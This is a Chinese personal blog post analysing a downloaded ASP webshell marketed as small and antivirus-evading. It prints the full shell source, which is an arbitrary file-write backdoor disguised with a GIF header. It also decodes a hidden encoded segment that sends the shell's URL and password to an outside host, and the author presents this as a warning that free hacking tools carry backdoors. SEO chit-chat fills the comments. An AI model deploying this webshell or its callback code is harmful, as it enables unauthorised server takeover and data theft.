A-A+

网上的最小体积免杀ASP木马!

2014年10月10日 13:19 学习笔记 评论 12 条 阅读 1,972 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

今天在网上逛网络的时候,无意中到了一个网站:http://www.qq5252.com/?p=71 这里面说什么致力于打造纯净无公害的ASP木马!看到这些字,我觉得,,,嗯,,,,真的假的?虽然我自己手头有ASP木马,自己用的,但是决定还是看一下吧。把文件下载下来。打开文件代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
GIF89a$       ;<hTml>
<% if request("miemie")="av" then %>
<%
on error resume next
testfile=Request.form("2010")
if Trim(request("2010"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&Request.form("1988") & "")
if err =0 Then
response.write"<font color=red>Success</font>"
else
response.write"<font color=red>False</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<style type="text/css">
<!--
#Layer1 {
    position:absolute;
    left:500px;
    top:404px;
    width:118px;
    height:13px;
    z-index:7;
}
.STYLE1 {color: #9900FF}
-->
</style>
<%@ LANGUAGE = VBScript.Encode %><%UserPass="dede"
#@~^ywAAAA==./2Kxk+RSDbO+,J@!/1Dr2DP/M^'rJtDO2)JzXy hrU7\-R1G:Jl2rcl/2_!Ds'r'k+.7+MRj"SAUmKNn`rJE4DYw=&zr[D5;+kYc?nD-nM.CDbC4^+dcrCKPK|C6?:E*[.;!+/DRUnD7+..mDrC(V+kcJ!DVrbb[r[ald/xELjd+MKlk/'ErJ@*@!&km.kaO@*J@#@&10IAAA==^#~@
%>
<title></title>
<form method="POST" ACTION="">
<input type="text" size="54" name="2010" value="<%=server.mappath("akt.asp")%>"> <BR>
<TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
<input type="submit" name="Send" value="GO!">
<div id="Layer1"></div>
</form>
<% end if %>
</hTml>

这里面有一段代码引起了我的注意,其实说来作者也很SB,整个ASP木马都是没加密的状态,就中间有那么一段加密,换成谁,谁不都得满脑子问号!!!个人深表服气。。。我们解开下面这段加密的代码:

1
2
3
<%@ LANGUAGE = VBScript.Encode %><%UserPass="dede"
#@~^ywAAAA==./2Kxk+RSDbO+,J@!/1Dr2DP/M^'rJtDO2)JzXy hrU7\-R1G:Jl2rcl/2_!Ds'r'k+.7+MRj"SAUmKNn`rJE4DYw=&zr[D5;+kYc?nD-nM.CDbC4^+dcrCKPK|C6?:E*[.;!+/DRUnD7+..mDrC(V+kcJ!DVrbb[r[ald/xELjd+MKlk/'ErJ@*@!&km.kaO@*J@#@&10IAAA==^#~@
%>

解密后的代码如下:

1
2
3
<%@ LANGUAGE = VBScript %><%UserPass="dede"
response.write "<script src=""http://xz.winvvv.com/api.asp?url="&server.URLEncode("""http://"&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script>"
%>

朋友们,可不要告诉我不懂这段代码什么意思。。。这就是后门,赤裸裸的后门有木有。。我记得还有一个博客,分享什么最小体积免杀无后门ASP木马,本人看了,体积却是小,但是无后门?深表呵呵。最后说一句,网上下载的病毒软件说没病毒?呵呵。
发这篇文章其实也没什么目的,就是想说,免费的午餐?!呵呵。你得有那个能力去吃。

标签:

12 条留言  访客:7 条  博主:5 条

  1. 刘帅

    来逛逛,看看大牛哥哥的文章~

    • gdd

      感谢朋友没事就来逛逛,但是大牛可不敢当。 *-*

  2. 电商狼

    果然是大牛 佩服

    • gdd

      朋友,欢迎你转载文章,但是转载文章不留来源这个好像做的不地道了吧? 而且我已经表明,至少要留文本链接吧?

  3. 电商狼

    哦 我文字标注的 而且首页也挂了你的网站友情链接 你看看

    • gdd

      不好意思,刚才可能确实没有注意到说转载我博客的,忘下次留个普通文本地址,我已回添加贵站的博客(没有写哈尔滨SEO 但是写了张岩blog)忘见谅。

  4. 电商狼

    要是友链最好 电商SEO张岩 或者张岩SEO 嘿嘿

    • gdd

      其实如果你看我个人简介朋友你应该能明白,我也是搞SEO的,但是说真心的,这个博客就是纯自己分享知识,记录经验的博客,没想跟任何SEO方面的朋友交友链,不过看朋友你添加我博客友链了,咱们都是东北的必须要相互支持,就特地回了一个以表支持~ 谢谢 (还有如果真想做哈尔滨SEO),可是需要你下一番功夫了,呵呵。

  5. 电商狼

    以前我都在首页 的 只是无心搞这个 最近弄个博客有点想弄 也算是玩空间是垃圾空间域名是最近注册的 哈尔滨SEO这个不是什么复杂的 贵在用心 还有就是 你的黑客技术真心佩服 SEO这个东西个人觉得就是忽悠人

    • gdd

      呵呵 有机会能见面的话多交流交流 然后一起喝点。

  6. 电商狼

    呵呵当然可以 我QQ291828889

  7. Null

    ……………..

给我留言